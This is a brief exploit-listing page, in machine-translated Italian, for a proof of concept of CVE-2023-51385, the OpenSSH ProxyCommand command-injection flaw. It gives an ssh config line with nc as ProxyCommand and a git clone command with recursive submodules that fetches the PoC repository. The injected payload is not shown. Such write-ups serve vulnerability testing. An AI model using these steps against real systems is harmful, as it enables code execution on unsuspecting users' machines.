## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-WLAODUO-CVE-2023-51385_POC-TEST
CVE-2023-51385 poc
OpenSSH ProxyCommand RCE poc
OpenSSH <9.6 poc della vulnerabilità di command injection Cinese


## 1.`vim ~/.ssh/config` o modifica `C:/Users/username/.ssh/config` su sistema Windows
root@kitploit:~
host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
## 2\. `git clone https://github.com/WLaoDuo/CVE-2023-51385_poc-test --recurse-submodules`